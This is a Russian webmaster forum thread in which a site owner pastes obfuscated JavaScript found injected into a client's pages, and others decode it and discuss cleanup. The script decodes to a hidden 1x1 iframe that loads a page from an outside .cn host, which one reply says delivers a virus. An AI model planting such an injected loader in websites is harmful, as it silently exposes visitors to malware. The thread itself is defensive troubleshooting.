Форум Сайтостроение Веб-строительство

Новый вирус или я что-то пропустил?

ШO
На сайте с 27.12.2005
Offline
375
ШАНС-ON
563

Катаюсь сегодня на Хонде с девочкой, отдыхаю и звонит взволнованный клиент, говорит с сайтом огромные проблемы, перенаправляет на другой ресурс.

Ну вот я приехал и нашел на страницах вот такую красоту: 

<!--

function decode() {

   var t,o,l,i,j;

   var s='';

     s=s+'060047116101120116097116101097062060047116101120116097114101097062';

     s=s+'060105102114097109101032115114099061034104116116112058047047119109045115101114118105115046099110047';

     s=s+'115047105110046099103105063100101102097117108116034032119105100116104061049032104101105103104116061';

     s=s+'049032115116121108101061034118105115105098105108105116121058032104105100100101110034062060047105102';

     s=s+'114097109101062';

 t=''; l=s.length; i=0;

 while(i < (l-1)) {

       for(j=0;j<3;j++)

          {

                 t=t+s.charAt(i);

           i++;

          }

             document.write(String.fromCharCode(t));

       t='';

        }

}



decode();

//-->

</script>

Это что-то новенькое или забытое старенькое? Защищаться, как я понимаю, надо сменой пароля и не хранить его больше в тотал коммандере, или это взлом сайта?

Хостинг спэйсвеб.

DI
На сайте с 03.01.2007
Offline
123
DenIT
#1

надо в syslog'ах смотреть, когда изменяли файл и раньше - пробрались через фтп с паролем или взламывали скрипт.

Я думаю, это незабытое старое - просто усовершенствовали код инъекции:) Раньше знали только html и ставили iframe, теперь почитали самоучитель по js и вон какие простыни пишут:)

Высказывание идиотского утверждения требует на порядок меньше усилий, чем его последовательное и обоснованное опровержение и более того, иногда это опровержение вообще невозможно. © (http://zhurnal.lib.ru/s/shapiro_m_a/raspidiota.shtml)
ШO
На сайте с 27.12.2005
Offline
375
ШАНС-ON
#2

Главный вопрос для тех кто шарит :) Это чисто редирект или команда закачки виря тут тоже присутствует?

LEOnidUKG
На сайте с 25.11.2006
Offline
1774
LEOnidUKG
#3

Вирус тоже закачиваеться...

✅ Мой Телеграм канал по SEO, оптимизации сайтов и серверов: https://t.me/leonidukgLIVE ✅ Качественное и рабочее размещение SEO статей СНГ и Бурж: https://getmanylinks.ru/ ✅ Настройка и оптимизация серверов https://getmanyspeed.ru/
LEOnidUKG
На сайте с 25.11.2006
Offline
1774
LEOnidUKG
#4

ссылаеться на:

<iframe src="http://wm-servis.cn/s/in.cgi?default" width=1 height=

V
На сайте с 25.02.2003
Offline
176
vjazanie
#5

ШАНС-ON,

простое решение замените document.write на alert и читайте - там ифрейм(дальше лень читать)

можно еще на пхп переписать и прочитать

Работа в интернет, реальная оплата, не партнерка (http://www.vjazanie.ru/job.php)
ШO
На сайте с 27.12.2005
Offline
375
ШАНС-ON
#6

LEOnidUKG, китайцы. Я почему то уверен что это не хакк хостинга, а банально клиентик подцепил вирус :)

В коде, после тэга боди нашел это <!-- --> - это айпи-адрес сайта.

ШO
На сайте с 27.12.2005
Offline
375
ШАНС-ON
#7

Сайт вычистили, клиенту сказал сменить пароль и не сохранять его больше.

Ну спасибо вирусописателям, меня ждет премия :)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий